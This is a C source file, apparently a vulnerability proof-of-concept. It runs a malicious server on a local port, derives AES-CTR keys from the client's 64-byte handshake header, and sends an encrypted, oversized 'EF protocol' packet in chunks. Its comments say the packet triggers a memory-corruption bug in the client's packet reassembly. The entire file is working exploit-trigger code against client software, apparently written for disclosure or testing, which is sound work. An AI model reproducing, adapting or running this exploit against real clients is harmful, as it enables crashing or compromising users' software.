#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

#include <openssl/aes.h>
#include <openssl/modes.h>

#define LISTEN_ADDR INADDR_LOOPBACK
#define LISTEN_PORT 9992

void hexdump(const void* data, size_t size) {
  for (size_t i = 0; i < size; i += 16) {
    char hex[(3 * 16) + 1] = {};
    char ascii[16 + 1] = {};
    for (size_t j = 0; j < 16 && i + j < size; ++j) {
      uint8_t byte = ((const uint8_t*)data)[i + j];
      snprintf(&hex[j * 3], 4, "%02x ", byte);
      ascii[j] = (0x1f < byte && byte < 0x7f) ? byte : '.';
    }
    fprintf(stderr, "%04zx: %-48s| %-16s\n", i, hex, ascii);
  }
}

size_t recvn(int fd, uint8_t* buf, size_t buf_len) {
  uint8_t* ptr = buf;
  size_t remaining = buf_len;
  while (remaining) {
    ssize_t result = recv(fd, ptr, remaining, MSG_WAITALL);
    if (result > 0) {
      ptr += result;
      remaining -= result;
    } else if (result == 0
               || (errno != EAGAIN
                   && errno != EWOULDBLOCK
                   && errno != EINTR)) {
      break;
    }
  }
  return buf_len - remaining;
}

size_t sendn(int fd, const uint8_t* buf, size_t buf_len) {
  const uint8_t* ptr = buf;
  size_t remaining = buf_len;
  while (remaining) {
    ssize_t result = send(fd, ptr, remaining, MSG_WAITALL);
    if (result > 0) {
      ptr += result;
      remaining -= result;
    } else if (result == 0
               || (errno != EAGAIN
                   && errno != EWOULDBLOCK
                   && errno != EINTR)) {
      break;
    }
  }
  return buf_len - remaining;
}

void handle(int client_fd) {
  uint8_t header[64];
  uint8_t reverse_header[64];

  assert(sizeof(header) == recvn(client_fd, header, sizeof(header)));
  fprintf(stderr, "header\n");
  hexdump(header, sizeof(header));

  for (size_t i = 0; i < 64; ++i) {
    reverse_header[i] = header[63 - i];
  }

  AES_KEY decrypt_key;
  uint8_t decrypt_iv[16];
  uint32_t decrypt_num;
  uint8_t decrypt_count[16];
  AES_set_encrypt_key(&header[8], 256, &decrypt_key);
  memcpy(decrypt_iv, &header[40], 16);
  decrypt_num = 0;
  memset(decrypt_count, 0, sizeof(decrypt_count));

  AES_KEY encrypt_key;
  uint8_t encrypt_iv[16];
  uint32_t encrypt_num;
  uint8_t encrypt_count[16];
  AES_set_encrypt_key(&reverse_header[8], 256, &encrypt_key);
  memcpy(encrypt_iv, &reverse_header[40], 16);
  encrypt_num = 0;
  memset(encrypt_count, 0, sizeof(decrypt_count));

  // Trigger the bug in the simplest visible way; forcing the final reassembly
  // allocation to be above the largest size class, which means that it will
  // always be `delete`'d directly in the call to `reuse`.
  size_t packet_length = 160000 + 4;
  uint8_t* plain_packet = malloc(packet_length);
  assert(plain_packet);

  memset(plain_packet, 0x23, packet_length);

  // EF protocol, current_packet_length = 160000
  plain_packet[0] = 0x7f;
  plain_packet[1] = 0x40;
  plain_packet[2] = 0x9c;
  plain_packet[3] = 0x00;

  uint8_t* crypt_packet = malloc(packet_length);
  assert(crypt_packet);

  CRYPTO_ctr128_encrypt(plain_packet, crypt_packet, packet_length,
                        &encrypt_key, encrypt_iv, encrypt_count, &encrypt_num,
                        (block128_f)AES_encrypt);
  free(plain_packet);

  // Send the packet in chunks, so that we trigger the vulnerability.
  size_t i = 0;
  for (i = 0; i + 4096 < packet_length; i += 4096) {
    fprintf(stderr, "[*] sending chunk [%zu:%zu]\n", i, i + 4095);
    sendn(client_fd, &crypt_packet[i], 4096);
  }

  // Send the last chunk
  fprintf(stderr, "[*] sending last chunk [%zu:%zu]\n", i, packet_length);
  sendn(client_fd, &crypt_packet[i], packet_length - i);

  free(crypt_packet);
}

int main(int argc, char** argv) {
  struct sockaddr_in listen_addr;
  listen_addr.sin_family = AF_INET;
  listen_addr.sin_addr.s_addr = htonl(LISTEN_ADDR);
  listen_addr.sin_port = htons(LISTEN_PORT);

  int listen_fd = socket(AF_INET, SOCK_STREAM, 0);
  const int enabled = 1;
  setsockopt(listen_fd, SOL_SOCKET, SO_REUSEADDR, &enabled, sizeof(enabled));
  bind(listen_fd, (struct sockaddr*)&listen_addr, sizeof(listen_addr));
  listen(listen_fd, 1);

  int client_fd = accept(listen_fd, NULL, NULL);
  setsockopt(client_fd, IPPROTO_TCP, TCP_NODELAY, &enabled, sizeof(enabled));
  handle(client_fd);

  close(client_fd);
  close(listen_fd);
}